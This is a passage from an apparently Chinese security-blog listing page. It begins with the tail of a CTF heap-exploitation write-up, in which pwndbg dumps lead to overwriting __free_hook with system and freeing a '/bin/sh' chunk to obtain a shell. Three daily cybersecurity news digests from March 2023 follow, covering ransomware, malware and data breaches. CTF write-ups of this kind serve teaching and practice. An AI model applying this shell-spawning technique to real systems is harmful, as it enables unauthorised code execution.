0x5597ecced000+0x202040 0x5597eceef040 <heap>: 0x00005597ee8ef680 0x0000000000000000 0x5597eceef050 <heap+16>: 0x00005597ee8efab0 0x00005597ee8efb30 0x5597eceef060 <heap+32>: 0x00007f7694f2e8e8 0x0000000000000000 0x5597eceef070 <heap+48>: 0x0000000000000000 0x0000000000000000 0x202040是heap的偏移,可以从ida里面找到。 申请出来的堆,__free_hook在4号堆 pwndbg> x/32gx 0x00007f7694f2e8e8 0x7f7694f2e8e8 <__free_hook>: 0x0000000000000000 0x0000000000000000 0x7f7694f2e8f8 <next_to_use>: 0x0000000000000000 0x0000000000000000 成功证明, 然后已知4号堆是__free_hook了,那么将4号堆的内容改成system的地址,不就可以了吗 然后再把3号堆写入/bin/sh 然后free(实际上已经变成system)掉3号堆(实际上已经是/bin/sh)了 成功取得shell 总结 做堆题主要是要有一个总体想法就是要把什么变成system去执行shell,或者也有别的,比如malloc等。 这里只是一个总体思路,毕竟拿到堆题如果一条总想法都没有的话,就只能干坐着了。
网络安全日报 2023年03月21日
1、BianLian勒索组织逐渐采用数据泄露勒索代替加密勒索 https://redacted.com/blog/bianlian-ransomware-gang-continues-to-evolve/ 自从我们首次报告被称为 BianLian 的勒索软件组织以来,我们一直在关注他们的活动。最值得注意的是,BianLian已经将攻击的主要重点从勒索加密文件转移到更多地关注数据泄露勒索,以此作为从受害者那里勒索的手段。 2、Play勒索组织攻击了荷兰航运公司Royal Dirkzwager https://securityaffairs.com/143714/cyber-crime/play-ransomware-royal-dirkzwager.html Play 勒索软件组袭击了荷兰海运物流公司Royal Dirkzwager。Royal Dirkzwager 专注于优化航运流程和管理海运物流信息。勒索组织宣布窃取了私人机密数据、员工 ID、护照、合同等。该团伙最初泄露了一个 5 GB 的档案作为攻击的证据,并威胁说如果不支付赎金,就会泄露全部文件。 3、NBA第三方通讯供应商泄露了部分球迷信息 https://securityaffairs.com/143693/data-breach/nba-data-breach.html 在一家提供时事通讯服务的第三方公司遭到网络攻击后,NBA披露了一起数据泄露事件。NBA称,未经授权的第三方创建了部分粉丝的姓名和电子邮件地址的副本。数据泄露并未泄露用户名、密码和其他信息。 4、报告称超10%的组织访问过已知的C2服务器 https://www.csoonline.com/article/3690518/dns-data-shows-one-in-10-organizations-have-malware-traffic-on-their-networks.html 根据云和内容交付网络提供商Akamai的一份报告,去年10% 到 16% 组织网络中的 DNS 流量流向过与已知僵尸网络和各种其他恶意软件威胁相关的命令和控制 (C2) 服务器。报告称,超过四分之一的流量流向了属于初始访问代理商的服务器,攻击者将对公司网络的访问权出售给其他网络犯罪分子。 5、卡巴斯基发布了针对基于 Conti 的勒索软件的新解密器 https://securityaffairs.com/143687/cyber-crime/kaspersky-decryptor-conti-based-ransomware.html 卡巴斯基基于此前泄露的Conti勒索软件源代码,发布了新版Conti勒索软件解密工具。 6、臭名昭著的 Emotet 恶意软件卷土重来,通过OneNote进行传播 https://securityaffairs.com/143722/cyber-crime/emotet-microsoft-onenote-campaign.html Emotet 恶意软件在中断三个月后卷土重来,威胁者正在通过 Microsoft OneNote 电子邮件分发它。 7、Mispadu 银行木马针对拉丁美洲国家用户进行凭证窃取 https://thehackernews.com/2023/03/mispadu-banking-trojan-targets-latin.html 一个名为Mispadu的银行木马与多个针对玻利维亚、智利、墨西哥、秘鲁和葡萄牙等国家的垃圾邮件活动有关,其目的是窃取凭证并提供其他有效载荷。 8、新的 DotRunpeX 恶意软件通过恶意广告传播多个恶意软件 https://thehackernews.com/2023/03/new-dotrunpex-malware-delivers-multiple.html 一种名为dotRunpeX的新恶意软件正在用于分发许多已知的恶意软件系列,例如Agent Tesla、Ave Maria、BitRAT、FormBook、LokiBot、NetWire、Raccoon Stealer、RedLine Stealer、Remcos、Rhadamanthys和Vidar。 9、《电信领域违法行为举报处理规定》发布 ,6 月 1 日起施行 http://www.anquan419.com/knews/24/4644.html 为规范电信领域违法行为举报处理工作,维护电信市场秩序,保护电信用户合法权益,根据《中华人民共和国行政处罚法》《中华人民共和国电信条例》等法律法规,结合工作实际,工业和信息化部近日印发《电信领域违法行为举报处理规定》。 10、 FCC 出台新规,要求美国无线运营商屏蔽诈骗短信 https://www.ithome.com/0/680/281.htm 美国联邦通信委员会(FCC)近日宣布通过一项新的法案,要求包括运营商在内的无线公司屏蔽诈骗短信。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年03月20日
1、TeamTNT组织被怀疑使用挖矿程序掩饰数据窃取的目的 https://thehackernews.com/2023/03/cryptojacking-group-teamtnt-suspected.html Cado Security详细介绍了一种名为SCARLETEEL的攻击,旨在针对容器化环境,最终窃取专有数据和软件。但该攻击链的早期阶段涉及使用加密货币挖掘程序,云安全公司怀疑该程序被部署为诱骗挖矿程序,以掩盖数据外泄的检测。Cado Security的一项新分析显示,这个样本“具有相似之处,包含一个曾被归属于TeamTNT的钱包ID”,这表明样本与TeamTNT有关。 2、攻击者利用伪造的Telegram和WhatApp网站投递木马 https://thehackernews.com/2023/03/lookalike-telegram-and-whatsapp.html 类似Telegram和WhatsApp的即时通讯应用程序的山寨伪造网站被用来传播木马程序,感染Android和Windows用户的设备,并在攻击中使用了加密货币剪贴板劫持器(clipper)恶意软件。这是首次发现clipper恶意软件被内置到即时消息应用程序中。此外,一些应用程序使用光学字符识别(OCR)技术来识别存储在受感染设备上的屏幕截图中的文本,这对于Android恶意软件也是首次出现。 3、研究人员披露针对PyPI库的8起攻击事件 https://blog.sonatype.com/top-8-malicious-attacks-recently-found-on-pypi Python包索引(PyPI)是Python软件包的官方存储库,Python开发人员广泛使用它来查找和安装有用的库和工具。然而,与其他软件存储库一样,PyPI也可能受到不良行为者的攻击。Sonatype的安全研究团队近期发现了PyPI上的8次恶意攻击并进行披露,旨在让更多人了解这个问题。 4、Conti勒索软件的MeowCorp变种现已有免费解密器 https://www.bleepingcomputer.com/news/security/conti-based-ransomware-meowcorp-gets-free-decryptor/ 网络安全公司卡巴斯基的研究员在一个论坛上发现了漏洞,使得他们在该论坛上获取到了包含 258 个修改版 Conti 勒索软件变种的私钥缓存。过去一年间,该变种被用于攻击各种私人和公共组织,一些研究员将其命名为 MeowCorp。 5、美国FBI、CISA和MS-ISAC发布Lockbit 3.0勒索软件的警告 https://securityaffairs.com/143668/breaking-news/lockbit-3-0-ransomware-joint-alert.html 美国联邦调查局 (FBI)、网络安全和基础设施安全局 (CISA) 以及多州信息共享与分析中心 (MS-ISAC) 发布了一份联合警报,提供了与臭名昭著的LockBit 3.0勒索软件相关的威胁指示器(IOCs)以及战术、技术和过程(TTPs)。 6、研究人员发现一种基于 Go 的新 DDoS 僵尸网络:HinataBot https://securityaffairs.com/143618/cyber-crime/hinatabot-go-based-ddos-botnet.html Akamai 研究人员发现了一个新的基于 DDoS Golang 的僵尸网络,称为 HinataBot,通过利用已知缺陷来破坏路由器和服务器。 7、研究人员利用ChatGPT实现动态生成代码的恶意软件 https://www.hackread.com/chatgpt-blackmamba-malware-keylogger/ HYAS Institute 研究员和网络安全专家 Jeff Sims 开发了一种名为 Blackmamba 的新型ChatGPT驱动的键盘记录恶意软件,它可以绕过终端安全软件。它每次执行都会调用 ChatGPT/text-DaVinci-003,编写一个独特的键盘记录器 Python 脚本。 8、攻击者利用Adobe Acrobat Sign传播Redline窃密木马 https://www.bleepingcomputer.com/news/security/adobe-acrobat-sign-abused-to-push-redline-info-stealing-malware/ 网络攻击者滥用在线文档签名服务 Adobe Acrobat Sign 向用户投递信息窃取恶意软件。利用该服务发送恶意电子邮件,可以绕过安全保护并诱使收件人信任收到的电子邮件。Avast的研究人员报告了这一新攻击手法。 9、Winter Vivern APT组织针对多国发起攻击 https://thehackernews.com/2023/03/winter-vivern-apt-group-targeting.html Winter Vivern组织(也被称为 UAC-0114)上个月在乌克兰计算机应急响应小组 (CERT-UA) 详细介绍针对乌克兰和波兰的恶意软件活动后引起了人们的注意,攻击活动中该组织传播一种名为 Aperetif 的恶意软件。虽然威胁行为者的来源尚不清楚,但攻击模式表明该组织可能支持白俄罗斯和俄罗斯。 10、Clop 勒索软件通过 GoAnywhere 零日漏洞攻击并窃取了日立能源的数据 https://securityaffairs.com/143640/data-breach/hitachi-energy-data-breach.html 日立能源披露了一起数据泄露事件,Clop 勒索软件团伙利用最近的 GoAnywhere 零日漏洞窃取了公司数据。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年03月17日
1、Web3中的Payzero骗局会让受害者一无所有 https://www.4hou.com/posts/17KV 诈骗者通过伪造的智能合约锁定潜在受害者,然后悄悄盗取受害者的数字资产,如NFT代币。我们把这个诈骗命名为“(Payzero)零支付”。 2、LockBit勒索组织声称攻击了Essendant公司 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-claims-essendant-attack-company-says-network-outage-/ LockBit 勒索软件组织声称对办公产品批发分销商 Essendant 发起了网络攻击,而此前该公司由于“重大”且持续的故障而导致运营中断。正如BleepingComputer早些时候报道的那样,Essendant 大范围的网络中断一直在影响在线订单的下达或执行,影响了公司的客户和供应商。货运公司也被告知暂缓取件。 3、警方关闭了与超30亿美元洗钱有关的混币器平台 https://cyberscoop.com/police-shut-down-cryptocurrency-mixer-chipmixer/ 欧洲和美国执法官员周三宣布,他们已经取缔了一个加密货币混合器,该混合器负责处理价值超过 30 亿美元的与犯罪活动相关的交易。加密货币混合器从不同的账户中转移资金,以帮助用户隐藏他们资金的来源,以此实现更隐蔽的加密货币资金转移。 4、多个黑客组织利用存在超过3年的漏洞入侵美国联邦机构 https://thehackernews.com/2023/03/multiple-hacker-groups-exploit-3-year.html 多个威胁组织利用Progress Telerik存在的三年安全漏洞,成功入侵了一个美国联邦机构。此消息来自于网络安全和基础设施安全局(CISA)、联邦调查局(FBI)和多州信息共享与分析中心(MS-ISAC)发布的联合消息。这些机构表示:“利用此漏洞允许恶意行为者在联邦文职行政部门(FCEB)机构的Microsoft Internet信息服务(IIS)Web服务器上成功执行远程代码。” 5、医疗供应商ILS数据泄露影响超420万人 https://www.govinfosecurity.com/long-term-care-services-firm-says-breach-affects-42-million-a-21448 Independent Living Systems (ILS) 是一家为老年和残疾患者提供管理式医疗服务的供应商。据披露,该组织去年夏天发生的网络安全事件已经影响了超过 420 万人,ILS 尚未澄清该事件是否是勒索软件导致。 6、三星 Exynos 芯片组中的基带 RCE 漏洞使设备面临远程黑客攻击 https://securityaffairs.com/143582/hacking/baseband-flaws-samsung-exynos.html Google’s Project Zero 在三星的 Exynos 芯片组中发现了多个缺陷,这些缺陷使设备在没有用户交互的情况下被远程黑客攻击。 7、Mozilla 通过发布 Firefox 111 修补高危漏洞 https://www.securityweek.com/mozilla-patches-high-severity-vulnerabilities-with-release-of-firefox-111/ Firefox 111 修补了 13 个 CVE,包括几个被归类为高严重性的漏洞。 8、CISA 发布紧急警告:Adobe ColdFusion 漏洞正在被利用 https://thehackernews.com/2023/03/cisa-issues-urgent-warning-adobe.html CISA 将 Adobe ColdFusion 漏洞(CVE-2023-26360)添加到已知被利用漏洞目录中。 9、越来越多的 DigitalOcean 服务器被用于诈骗与钓鱼攻击 https://www.freebuf.com/articles/network/360464.html Netskope 发现在过去的六个月中,部署在 DigitalOcean 上的恶意网页流量增长了 17 倍。研究人员发现攻击者模仿 Windows Defender 欺骗用户,使用户以为其计算机已经被攻陷且需要技术支持,诱骗受害者拨打虚假的“求助热线”。随后,攻击者远程访问受害者的计算机并且安装恶意软件,或者要求用户支付清除感染的服务费。 10、9亿条印度警方业务机密数据疑似在暗网销售 https://www.secrss.com/articles/52784 超过9亿份印度法律文件记录/文档、被捕/被控人以及警方/法庭报告在暗网售卖。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页